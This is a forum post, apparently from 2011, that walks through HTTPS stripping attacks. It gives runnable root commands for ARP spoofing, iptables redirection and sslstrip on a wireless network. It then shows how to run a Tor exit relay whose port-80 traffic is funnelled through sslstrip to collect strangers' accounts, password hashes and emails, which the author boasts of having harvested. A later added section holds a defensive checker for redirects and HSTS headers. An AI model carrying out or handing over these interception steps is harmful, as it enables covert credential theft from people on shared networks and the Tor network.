me.mello Posted June 18, 2011 (edited)

Author: Juan J. Fernandez

Secure Socket Layer is not as secure as we might think, at least across http and https. Vulnerabilities appear at the hand-off between http and https in both directions. These are exploited with https stripping attacks, which transparently hijack http traffic on a network, watch for https links and redirects, and map those links into look-alike http links. The SSLSTRIP tool does exactly that and can be deployed through a man-in-the-middle attack on a wireless network using iptables and arpspoof. It can also be deployed on the Tor network if you configure your computer as an exit relay on port 80.

REQUIREMENTS

I assume you are using a GNU/Linux OS or Mac OS X.

- SSLSTRIP: the main tool for our stripping attack
- IPTABLES: to match our target traffic and redirect it to sslstrip
- ARPSPOOF: used on a wireless network to make our computer look like the router
- Tor as a relay: to apply the concept once we enter another network

Wireless https stripping attack

As root, type in the terminal:

echo "1" > /proc/sys/net/ipv4/ip_forward
arpspoof -i <interface, e.g. wlan0> <LAN gateway IP, e.g. 192.168.1.1>

This lets your Linux box forward packets and performs ARP injection so that every computer believes your MAC address is the MAC address of the router, thus forwarding all those packets to you.

Now open another terminal as root and type:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

This sets the filtering (firewall) rule "alter packets destined to port 80 as soon as they arrive, redirecting them to port 8080".

Now, in the same terminal as root, type sslstrip -l 8080 -w sslstrip.log and in another terminal type tail -f sslstrip.log .

At this point sslstrip does the job, and neither the server nor the client knows that you are hijacking http and watching for https links to redirect and map into similar http links or homograph-similar https links. The tail command lets you watch the log file as it grows.

Tor network https stripping attack

A wireless network is like any other network. Why not apply the same thing to another network, like the Tor network? It only requires a minor modification to the iptables command, dropping the use of arpspoof, and of course setting up Tor as a relay.

Set up a Tor relay

Tor is a network of relays: when someone uses Tor, their traffic passes through about three computers (relays) before reaching the final destination. I will show you how to be the exit node (the last relay).

We will create another account so the redirection applies only to that uid (the user id, not us), which prevents the disconnection... Open a terminal as root and type useradd toruser -u 111 -m and passwd toruser (use whatever password you like). Then log out of your account and log in as toruser.

Install Tor (Tor: Linux/BSD/Unix Install Instructions). For the purpose of this presentation, download the Tor Browser Bundle for GNU/Linux from Download Tor, extract it with tar xvfz file.tar.gz, cd into the extracted directory and run vidalia in filedirectory/App. Once it is running, click "setup relay" and configure the exit node for port 80 only. Make sure your router forwards ports 80, 9051, 9001 and 9030 to your local IP if you are behind the router's firewall.

Once you have tested it and verified that it is reachable from the outside by running it again, log out of the toruser account and log back in to your original account.

Now the fun part starts...

Sniff out that Tor network !!!

Open a terminal, type su toruser and enter the assigned password. This is the important step to run the relay: cd into the tor-browser_en-US directory (in my case) inside the toruser home and run tor:

./App/tor -f /home/toruser/tor-browser_en-US/Data/Tor/torrc

Now that everything is running and reachable from outside, open another terminal and as root type:

iptables -t nat -I OUTPUT -p tcp -m owner --uid-owner 111 --dport 80 -j DNAT --to-destination 127.0.0.1:8080

Everything that comes from toruser is redirected to local port 8080. DNAT rewrites the destination of the matching packets, which is why it belongs in the OUTPUT chain here, where locally generated traffic is matched (these are iptables details worth knowing to see what is really happening...).

Now type sslstrip -l 8080 -w logfile and, in another terminal, tail -f logfile to watch the file as it grows. Let it run for a couple of hours or days and you will see accounts, md5 hashes, email messages, hosting accounts and more.

The next page is just a small part of what I collected from the Tor network.

References

- DEFCON 17
- SSLSTRIP: Moxie Marlinspike >> software >> sslstrip
- Tor: Tor Documentation
- IPTABLES: iptables(8) - Linux man page

Have fun reading ><

Edited June 18, 2011 by me.mello
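Added example, not from the original post or from the sslstrip project: a Python check of the two server-side defences that stop the https-to-http rewrite described above, an http-to-https redirect plus an HSTS header (RFC 6797, not mentioned in the post) on the https response. The responses it checks are constructed samples, and the header names are assumed to be lower-cased.

```python
# Added example, not from the original post. Checks whether a site's own
# responses defend against the https-to-http rewrite described above: the
# plain-http endpoint must redirect to https and the https response must
# carry HSTS (RFC 6797); browsers ignore HSTS that arrives over plain http.
import re

ONE_YEAR = 365 * 24 * 3600

def parse_hsts(value):
    """Split a Strict-Transport-Security header into its directives."""
    policy = {"max_age": None, "include_subdomains": False, "preload": False}
    for directive in value.split(";"):
        directive = directive.strip()
        m = re.fullmatch(r'max-age\s*=\s*"?(\d+)"?', directive, re.I)
        if m:
            policy["max_age"] = int(m.group(1))
        elif directive.lower() == "includesubdomains":
            policy["include_subdomains"] = True
        elif directive.lower() == "preload":
            policy["preload"] = True
    return policy

def stripping_findings(http_resp, https_resp):
    """Each response is (status, headers) with lower-cased header names.
    Returns the weaknesses that let an on-path https-to-http rewrite work."""
    findings = []
    status, headers = http_resp
    location = headers.get("location", "")
    if not (300 <= status < 400 and location.lower().startswith("https://")):
        findings.append("plain-http response does not redirect to https")
    status, headers = https_resp
    hsts = headers.get("strict-transport-security")
    if hsts is None:
        findings.append("no HSTS header on https response")
        return findings
    policy = parse_hsts(hsts)
    if policy["max_age"] is None:
        findings.append("HSTS header has no max-age (browsers ignore it)")
    elif policy["max_age"] < ONE_YEAR:
        findings.append("HSTS max-age shorter than one year")
    if not policy["include_subdomains"]:
        findings.append("HSTS does not cover subdomains")
    return findings

# Constructed sample responses: the same site before and after hardening.
WEAK = ((200, {"content-type": "text/html"}),
        (200, {"strict-transport-security": "max-age=300"}))
HARDENED = ((301, {"location": "https://example.test/"}),
            (200, {"strict-transport-security":
                   "max-age=63072000; includeSubDomains; preload"}))
```

Run stripping_findings(*WEAK) and stripping_findings(*HARDENED) to compare the two; only the hardened site leaves a first-time visitor nothing to strip.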